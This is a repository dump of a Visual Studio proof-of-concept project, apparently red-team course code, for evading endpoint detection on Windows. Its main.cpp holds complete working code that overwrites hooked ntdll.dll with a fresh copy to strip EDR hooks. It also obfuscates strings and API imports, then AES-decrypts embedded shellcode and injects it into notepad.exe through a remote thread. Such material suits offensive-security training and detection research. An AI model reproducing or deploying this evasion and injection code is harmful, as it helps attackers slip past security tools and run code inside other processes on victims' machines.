├── .vs
└── ReplaceHookedNTDLLwFreshCopy
│ └── v16
│ ├── .suo
│ ├── Browse.VC.db
│ └── ipch
│ └── AutoPCH
│ ├── 703f1d784b28c46b
│ └── IMPLANT.ipch
│ └── d9c4ef18c17a115c
│ └── MAIN.ipch
├── README.md
├── ReplaceHookedNTDLLwFreshCopy.sln
├── ReplaceHookedNTDLLwFreshCopy
├── ReplaceHookedNTDLLwFreshCopy.vcxproj
├── ReplaceHookedNTDLLwFreshCopy.vcxproj.filters
├── ReplaceHookedNTDLLwFreshCopy.vcxproj.user
├── main.cpp
└── x64
│ └── Release
│ ├── ReplaceH.00c07e1a.tlog
│ ├── CL.command.1.tlog
│ ├── CL.read.1.tlog
│ ├── CL.write.1.tlog
│ ├── ReplaceHookedNTDLLwFreshCopy.lastbuildstate
│ ├── link.command.1.tlog
│ ├── link.read.1.tlog
│ └── link.write.1.tlog
│ ├── ReplaceHookedNTDLLwFreshCopy.exe.recipe
│ ├── ReplaceHookedNTDLLwFreshCopy.iobj
│ ├── ReplaceHookedNTDLLwFreshCopy.ipdb
│ ├── ReplaceHookedNTDLLwFreshCopy.log
│ ├── main.obj
│ └── vc142.pdb
└── x64
└── Release
├── ReplaceHookedNTDLLwFreshCopy.exe
└── ReplaceHookedNTDLLwFreshCopy.pdb
/.vs/ReplaceHookedNTDLLwFreshCopy/v16/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/.vs/ReplaceHookedNTDLLwFreshCopy/v16/.suo
--------------------------------------------------------------------------------
/.vs/ReplaceHookedNTDLLwFreshCopy/v16/Browse.VC.db:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/.vs/ReplaceHookedNTDLLwFreshCopy/v16/Browse.VC.db
--------------------------------------------------------------------------------
/.vs/ReplaceHookedNTDLLwFreshCopy/v16/ipch/AutoPCH/703f1d784b28c46b/IMPLANT.ipch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/.vs/ReplaceHookedNTDLLwFreshCopy/v16/ipch/AutoPCH/703f1d784b28c46b/IMPLANT.ipch
--------------------------------------------------------------------------------
/.vs/ReplaceHookedNTDLLwFreshCopy/v16/ipch/AutoPCH/d9c4ef18c17a115c/MAIN.ipch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/.vs/ReplaceHookedNTDLLwFreshCopy/v16/ipch/AutoPCH/d9c4ef18c17a115c/MAIN.ipch
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ClassicAPIUnhooking
2 |
3 | This project is a simple Proof of Concept that unhooks EDR solutions from windows APIs using the classic map NTDLL.dll over the original DLL loaded into the processes' memory.
4 |
5 | The payload executed is a simple message box shellcode that has been AES encrypted. It will be injected into the notepad process using the classic shellcode injection technique.
6 | Not many attempts at obfuscation are made. All code was created by the Sektor7 Institute team, I simply created it into a VS project.
7 |
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31410.357
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ReplaceHookedNTDLLwFreshCopy", "ReplaceHookedNTDLLwFreshCopy\ReplaceHookedNTDLLwFreshCopy.vcxproj", "{00C07E1A-BC2C-47E9-8FF6-D53FAA402D72}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {00C07E1A-BC2C-47E9-8FF6-D53FAA402D72}.Debug|x64.ActiveCfg = Debug|x64
17 | {00C07E1A-BC2C-47E9-8FF6-D53FAA402D72}.Debug|x64.Build.0 = Debug|x64
18 | {00C07E1A-BC2C-47E9-8FF6-D53FAA402D72}.Debug|x86.ActiveCfg = Debug|Win32
19 | {00C07E1A-BC2C-47E9-8FF6-D53FAA402D72}.Debug|x86.Build.0 = Debug|Win32
20 | {00C07E1A-BC2C-47E9-8FF6-D53FAA402D72}.Release|x64.ActiveCfg = Release|x64
21 | {00C07E1A-BC2C-47E9-8FF6-D53FAA402D72}.Release|x64.Build.0 = Release|x64
22 | {00C07E1A-BC2C-47E9-8FF6-D53FAA402D72}.Release|x86.ActiveCfg = Release|Win32
23 | {00C07E1A-BC2C-47E9-8FF6-D53FAA402D72}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {41A9083F-9856-4A0E-A9BD-D69801B06B31}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/ReplaceHookedNTDLLwFreshCopy.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {00c07e1a-bc2c-47e9-8ff6-d53faa402d72}
25 | ReplaceHookedNTDLLwFreshCopy
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/ReplaceHookedNTDLLwFreshCopy.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/ReplaceHookedNTDLLwFreshCopy.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/main.cpp:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Red Team Operator course code template
4 | classic code injection + with unhooks
5 |
6 | author: reenz0h (twitter: @SEKTOR7net)
7 | credits: NtRaiseHardError
8 |
9 | */
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #pragma comment (lib, "crypt32.lib")
18 | #pragma comment (lib, "advapi32")
19 |
20 | // MessageBox shellcode - 64-bit
21 | unsigned char payload[] = { 0x23, 0xe5, 0x84, 0x36, 0xce, 0x23, 0x3b, 0xe7, 0x55, 0x66, 0x8, 0x50, 0xf3, 0x44, 0xc2, 0xe8, 0x90, 0xf0, 0x8, 0x60, 0x2c, 0x2a, 0xcc, 0x7c, 0xf1, 0x6a, 0xa5, 0x48, 0x10, 0x57, 0x10, 0x7e, 0x10, 0x24, 0x5, 0x90, 0x40, 0x14, 0x7d, 0xd3, 0xba, 0x4e, 0x7f, 0x5, 0xb7, 0x17, 0xa3, 0x4, 0x91, 0x5, 0x97, 0xd7, 0xcb, 0xa2, 0x34, 0x7c, 0x90, 0xc9, 0x4f, 0x65, 0x9d, 0x18, 0x29, 0x15, 0xd8, 0xf9, 0x1d, 0xed, 0x96, 0xc4, 0x1f, 0xee, 0x2c, 0x80, 0xc8, 0x15, 0x4b, 0x68, 0x46, 0xa0, 0xe8, 0xc0, 0xb8, 0x5f, 0x5e, 0xd5, 0x5d, 0x7d, 0xd2, 0x52, 0x9b, 0x20, 0x76, 0xe0, 0xe0, 0x52, 0x23, 0xdd, 0x1a, 0x39, 0x5b, 0x66, 0x8c, 0x26, 0x9e, 0xef, 0xf, 0xfd, 0x26, 0x32, 0x30, 0xa0, 0xf2, 0x8c, 0x2f, 0xa5, 0x9, 0x2, 0x1c, 0xfe, 0x4a, 0xe8, 0x81, 0xae, 0x27, 0xcf, 0x2, 0xaf, 0x18, 0x54, 0x3c, 0x97, 0x35, 0xfe, 0xaf, 0x79, 0x35, 0xfa, 0x99, 0x3c, 0xca, 0x18, 0x8d, 0xa1, 0xac, 0x2e, 0x1e, 0x78, 0xb6, 0x4, 0x79, 0x5e, 0xa7, 0x6d, 0x7f, 0x6e, 0xa3, 0x34, 0x8b, 0x68, 0x6d, 0x2a, 0x26, 0x49, 0x1e, 0xda, 0x5e, 0xe4, 0x77, 0x29, 0x6e, 0x15, 0x9, 0x69, 0x8b, 0x8d, 0xbd, 0x42, 0xb6, 0xd9, 0xb0, 0x90, 0xd8, 0xa1, 0xb9, 0x37, 0x80, 0x8c, 0x5d, 0xaf, 0x98, 0x11, 0xef, 0xe1, 0xcf, 0xec, 0xe7, 0xc5, 0x58, 0x73, 0xf, 0xce, 0x1e, 0x27, 0x9e, 0xc0, 0x8a, 0x36, 0xd5, 0x6b, 0x9d, 0x52, 0xe, 0x68, 0x30, 0x7c, 0x45, 0x7c, 0xb3, 0xc1, 0x3f, 0x88, 0xdc, 0x78, 0x2, 0xe6, 0xbf, 0x45, 0x2d, 0x56, 0x76, 0x15, 0xc8, 0x4c, 0xe2, 0xcd, 0xa4, 0x46, 0x38, 0x6b, 0x41, 0x2b, 0xdf, 0x24, 0x2c, 0xf1, 0x82, 0x78, 0xd1, 0xc4, 0x83, 0x7f, 0x33, 0xb5, 0x8c, 0xf7, 0xac, 0x30, 0x14, 0x0, 0x6f, 0xba, 0xf7, 0x13, 0x51, 0x6a, 0x17, 0x1c, 0xf7, 0xcd, 0x43, 0x79, 0xc2, 0x57, 0xa0, 0x9c, 0x7b, 0x12, 0xce, 0x45, 0x41, 0x4e, 0xb7, 0x6b, 0xbd, 0x22, 0xc, 0xfb, 0x88, 0x2a, 0x4c, 0x2, 0x84, 0xf4, 0xca, 0x26, 0x62, 0x48, 0x6e, 0x9b, 0x3b, 0x85, 0x22, 0xff, 0xf0, 0x4f, 0x55, 0x7b, 0xc3, 0xf4, 0x9d, 0x2d, 0xe8, 0xb6, 0x44, 0x4a, 0x23, 0x2d, 0xf9, 0xe1, 0x6, 0x1c, 0x74, 0x23, 0x6, 0xdb, 0x3c, 0x3c, 0xa6, 0xce, 0xcf, 0x38, 0xae, 0x87, 0xd1, 0x8 };
22 | unsigned char key[] = { 0xc0, 0xa6, 0x8b, 0x1b, 0x59, 0x92, 0xcf, 0x6b, 0xef, 0x96, 0xe7, 0xd7, 0x33, 0x65, 0xda, 0x84 };
23 |
24 | unsigned int payload_len = sizeof(payload);
25 |
26 | typedef BOOL(WINAPI* VirtualProtect_t)(LPVOID, SIZE_T, DWORD, PDWORD);
27 | typedef HANDLE(WINAPI* CreateFileMappingA_t)(HANDLE, LPSECURITY_ATTRIBUTES, DWORD, DWORD, DWORD, LPCSTR);
28 | typedef LPVOID(WINAPI* MapViewOfFile_t)(HANDLE, DWORD, DWORD, DWORD, SIZE_T);
29 | typedef BOOL(WINAPI* UnmapViewOfFile_t)(LPCVOID);
30 |
31 | unsigned char sNtdll[] = { 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l', 0x0 };
32 | unsigned char sKernel32[] = { 'k','e','r','n','e','l','3','2','.','d','l','l', 0x0 };
33 |
34 | int AESDecrypt(char* payload, unsigned int payload_len, char* key, size_t keylen) {
35 | HCRYPTPROV hProv;
36 | HCRYPTHASH hHash;
37 | HCRYPTKEY hKey;
38 |
39 | if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
40 | return -1;
41 | }
42 | if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
43 | return -1;
44 | }
45 | if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)) {
46 | return -1;
47 | }
48 | if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
49 | return -1;
50 | }
51 |
52 | if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)payload, (DWORD*)&payload_len)) {
53 | return -1;
54 | }
55 |
56 | CryptReleaseContext(hProv, 0);
57 | CryptDestroyHash(hHash);
58 | CryptDestroyKey(hKey);
59 |
60 | return 0;
61 | }
62 |
63 |
64 | void XORcrypt(char str2xor[], size_t len, char key) {
65 | /*
66 | XORcrypt() is a simple XOR encoding/decoding function
67 | */
68 | int i;
69 |
70 | for (i = 0; i < len; i++) {
71 | str2xor[i] = (BYTE)str2xor[i] ^ key;
72 | }
73 | }
74 |
75 |
76 |
77 | int FindTarget(const wchar_t* procname) {
78 |
79 | HANDLE hProcSnap;
80 | PROCESSENTRY32 pe32;
81 | int pid = 0;
82 |
83 | hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
84 | if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
85 |
86 | pe32.dwSize = sizeof(PROCESSENTRY32);
87 |
88 | if (!Process32First(hProcSnap, &pe32)) {
89 | CloseHandle(hProcSnap);
90 | return 0;
91 | }
92 |
93 | while (Process32Next(hProcSnap, &pe32)) {
94 | if (lstrcmpiW(procname, pe32.szExeFile) == 0) {
95 | pid = pe32.th32ProcessID;
96 | break;
97 | }
98 | }
99 |
100 | CloseHandle(hProcSnap);
101 |
102 | return pid;
103 | }
104 |
105 |
106 | // classic injection
107 | int Inject(HANDLE hProc, unsigned char* payload, unsigned int payload_len) {
108 |
109 | LPVOID pRemoteCode = NULL;
110 | HANDLE hThread = NULL;
111 |
112 | // Decrypt payload
113 | AESDecrypt((char*)payload, payload_len, (char*)key, sizeof(key));
114 |
115 | pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
116 | WriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T*)NULL);
117 |
118 | hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteCode, NULL, 0, NULL);
119 | if (hThread != NULL) {
120 | WaitForSingleObject(hThread, 500);
121 | CloseHandle(hThread);
122 | return 0;
123 | }
124 | return -1;
125 | }
126 |
127 |
128 | static int UnhookNtdll(const HMODULE hNtdll, const LPVOID pMapping) {
129 | /*
130 | UnhookNtdll() finds .text segment of fresh loaded copy of ntdll.dll and copies over the hooked one
131 | */
132 | // create a pointer to the NTHeaders of the unhooked NTDLL.dll binary.
133 | DWORD oldprotect = 0;
134 | PIMAGE_DOS_HEADER pImgDOSHead = (PIMAGE_DOS_HEADER)pMapping;
135 | PIMAGE_NT_HEADERS pImgNTHead = (PIMAGE_NT_HEADERS)((DWORD_PTR)pMapping + pImgDOSHead->e_lfanew);
136 | int i;
137 | // string obfuscation of VirtualProtect0x0 using a character array rather than char *.
138 | unsigned char sVirtualProtect[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t', 0x0 };
139 | // create pointer to the virtualProtect function for use w/o adding the function to our import address table.
140 | VirtualProtect_t VirtualProtect_p = (VirtualProtect_t)GetProcAddress(GetModuleHandleA((LPCSTR)sKernel32), (LPCSTR)sVirtualProtect);
141 |
142 | // find .text section
143 | for (i = 0; i < pImgNTHead->FileHeader.NumberOfSections; i++) {
144 | PIMAGE_SECTION_HEADER pImgSectionHead = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(pImgNTHead) +
145 | ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));
146 | //compare the section name with ".text" if passes continue.
147 | if (!strcmp((char*)pImgSectionHead->Name, ".text")) {
148 | // prepare ntdll.dll memory region for write permissions.
149 | // open the hooked NTDLL.dll memory location + the virtual address of the unhooked .text section and change the entire .text region to execute_readwrite mem permissions.
150 | VirtualProtect_p((LPVOID)((DWORD_PTR)hNtdll + (DWORD_PTR)pImgSectionHead->VirtualAddress),
151 | pImgSectionHead->Misc.VirtualSize,
152 | PAGE_EXECUTE_READWRITE,
153 | &oldprotect);
154 |
155 | //simply checks if oldProtect has a value, should be execute_read.
156 | if (!oldprotect) {
157 | // RWX failed!
158 | return -1;
159 | }
160 | // copy fresh .text section into ntdll memory
161 | // use mem copy to copy entire .text section over the unhooked NTDLL.dll over the hooked version of the NTDLL.dll
162 | memcpy((LPVOID)((DWORD_PTR)hNtdll + (DWORD_PTR)pImgSectionHead->VirtualAddress),
163 | (LPVOID)((DWORD_PTR)pMapping + (DWORD_PTR)pImgSectionHead->VirtualAddress),
164 | pImgSectionHead->Misc.VirtualSize);
165 |
166 | // restore original protection settings of ntdll memory
167 | VirtualProtect_p((LPVOID)((DWORD_PTR)hNtdll + (DWORD_PTR)pImgSectionHead->VirtualAddress),
168 | pImgSectionHead->Misc.VirtualSize,
169 | oldprotect,
170 | &oldprotect);
171 | if (!oldprotect) {
172 | // it failed
173 | return -1;
174 | }
175 | return 0;
176 | }
177 | }
178 |
179 | // failed? .text not found!
180 | return -1;
181 | }
182 |
183 |
184 |
185 |
186 | int main(void) {
187 |
188 | int pid = 0;
189 | HANDLE hProc = NULL;
190 |
191 | //unsigned char sNtdllPath[] = "c:\\windows\\system32\\";
192 | unsigned char sNtdllPath[] = { 0x59, 0x0, 0x66, 0x4d, 0x53, 0x54, 0x5e, 0x55, 0x4d, 0x49, 0x66, 0x49, 0x43, 0x49, 0x4e, 0x5f, 0x57, 0x9, 0x8, 0x66, 0x54, 0x4e, 0x5e, 0x56, 0x56, 0x14, 0x5e, 0x56, 0x56, 0x3a };
193 |
194 | unsigned char sCreateFileMappingA[] = { 'C','r','e','a','t','e','F','i','l','e','M','a','p','p','i','n','g','A', 0x0 };
195 | unsigned char sMapViewOfFile[] = { 'M','a','p','V','i','e','w','O','f','F','i','l','e',0x0 };
196 | unsigned char sUnmapViewOfFile[] = { 'U','n','m','a','p','V','i','e','w','O','f','F','i','l','e', 0x0 };
197 |
198 | unsigned int sNtdllPath_len = sizeof(sNtdllPath);
199 | unsigned int sNtdll_len = sizeof(sNtdll);
200 | int ret = 0;
201 | HANDLE hFile;
202 | HANDLE hFileMapping;
203 | LPVOID pMapping;
204 |
205 | // get function pointers
206 | // used to import functions for use without adding them to the import table directory.
207 | CreateFileMappingA_t CreateFileMappingA_p = (CreateFileMappingA_t)GetProcAddress(GetModuleHandleA((LPCSTR)sKernel32), (LPCSTR)sCreateFileMappingA);
208 | MapViewOfFile_t MapViewOfFile_p = (MapViewOfFile_t)GetProcAddress(GetModuleHandleA((LPCSTR)sKernel32), (LPCSTR)sMapViewOfFile);
209 | UnmapViewOfFile_t UnmapViewOfFile_p = (UnmapViewOfFile_t)GetProcAddress(GetModuleHandleA((LPCSTR)sKernel32), (LPCSTR)sUnmapViewOfFile);
210 |
211 | // open ntdll.dll
212 | // opens a fresh copy of the NTDLL.dll binary.
213 | // starts by xor decrypting the NTDLL.dll file path
214 | XORcrypt((char*)sNtdllPath, sNtdllPath_len, sNtdllPath[sNtdllPath_len - 1]);
215 | // opens a handle to the unhooked version of the NTDLL.dll binary.
216 | hFile = CreateFileA((LPCSTR)sNtdllPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
217 | if (hFile == INVALID_HANDLE_VALUE) {
218 | // failed to open ntdll.dll
219 | return -1;
220 | }
221 |
222 | // prepare file mapping
223 | // then we create a file mapping for our fresh NTDLL.dll copy.
224 | hFileMapping = CreateFileMappingA_p(hFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
225 | if (!hFileMapping) {
226 | // file mapping failed
227 | CloseHandle(hFile);
228 | return -1;
229 | }
230 |
231 | // map the bastard
232 | // then we map the file into our process memory!
233 | pMapping = MapViewOfFile_p(hFileMapping, FILE_MAP_READ, 0, 0, 0);
234 | if (!pMapping) {
235 | // mapping failed
236 | CloseHandle(hFileMapping);
237 | CloseHandle(hFile);
238 | return -1;
239 | }
240 |
241 | printf("Check 1!\n"); getchar();
242 |
243 | // remove hooks
244 | // then we call our unhooking function, by passing as parameters the location of the hooking NTDLL.dll memory location and our mapped unhooked version.
245 | ret = UnhookNtdll(GetModuleHandleA((LPCSTR)sNtdll), pMapping);
246 |
247 | printf("Check 2!\n"); getchar();
248 |
249 | // Clean up.
250 | UnmapViewOfFile_p(pMapping);
251 | CloseHandle(hFileMapping);
252 | CloseHandle(hFile);
253 |
254 | pid = FindTarget(L"notepad.exe");
255 |
256 | if (pid) {
257 | printf("Notepad.exe PID = %d\n", pid);
258 |
259 | // try to open target process
260 | hProc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
261 | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
262 | FALSE, (DWORD)pid);
263 |
264 | if (hProc != NULL) {
265 | Inject(hProc, payload, payload_len);
266 | CloseHandle(hProc);
267 | }
268 | }
269 | return 0;
270 | }
271 |
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/ReplaceHookedNTDLLwFreshCopy.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30037:VCServicingVersionATL=14.29.30038:VCServicingVersionCrtHeaders=14.29.30038:VCServicingVersionCompilers=14.29.30038:TargetPlatformVersion=10.0.19041.0:
2 | Release|x64|C:\sektor7\Win_Evasion\WEv\02.Non-Admin\01.Unhooks\02.FreshCopy\ReplaceHookedNTDLLwFreshCopy\|
3 |
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceH.00c07e1a.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceHookedNTDLLwFreshCopy.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | C:\sektor7\Win_Evasion\WEv\02.Non-Admin\01.Unhooks\02.FreshCopy\ReplaceHookedNTDLLwFreshCopy\x64\Release\ReplaceHookedNTDLLwFreshCopy.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceHookedNTDLLwFreshCopy.iobj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceHookedNTDLLwFreshCopy.iobj
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceHookedNTDLLwFreshCopy.ipdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceHookedNTDLLwFreshCopy.ipdb
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/ReplaceHookedNTDLLwFreshCopy.log:
--------------------------------------------------------------------------------
1 | main.cpp
2 | Generating code
3 | Previous IPDB not found, fall back to full compilation.
4 | All 9 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
5 | Finished generating code
6 | ReplaceHookedNTDLLwFreshCopy.vcxproj -> C:\sektor7\Win_Evasion\WEv\02.Non-Admin\01.Unhooks\02.FreshCopy\ReplaceHookedNTDLLwFreshCopy\x64\Release\ReplaceHookedNTDLLwFreshCopy.exe
7 |
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/main.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/main.obj
--------------------------------------------------------------------------------
/ReplaceHookedNTDLLwFreshCopy/x64/Release/vc142.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/ReplaceHookedNTDLLwFreshCopy/x64/Release/vc142.pdb
--------------------------------------------------------------------------------
/x64/Release/ReplaceHookedNTDLLwFreshCopy.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/x64/Release/ReplaceHookedNTDLLwFreshCopy.exe
--------------------------------------------------------------------------------
/x64/Release/ReplaceHookedNTDLLwFreshCopy.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Allevon412/ClassicAPIUnhooking/0fee92a9546c5df5dadcb2d640fb11683de728f0/x64/Release/ReplaceHookedNTDLLwFreshCopy.pdb
--------------------------------------------------------------------------------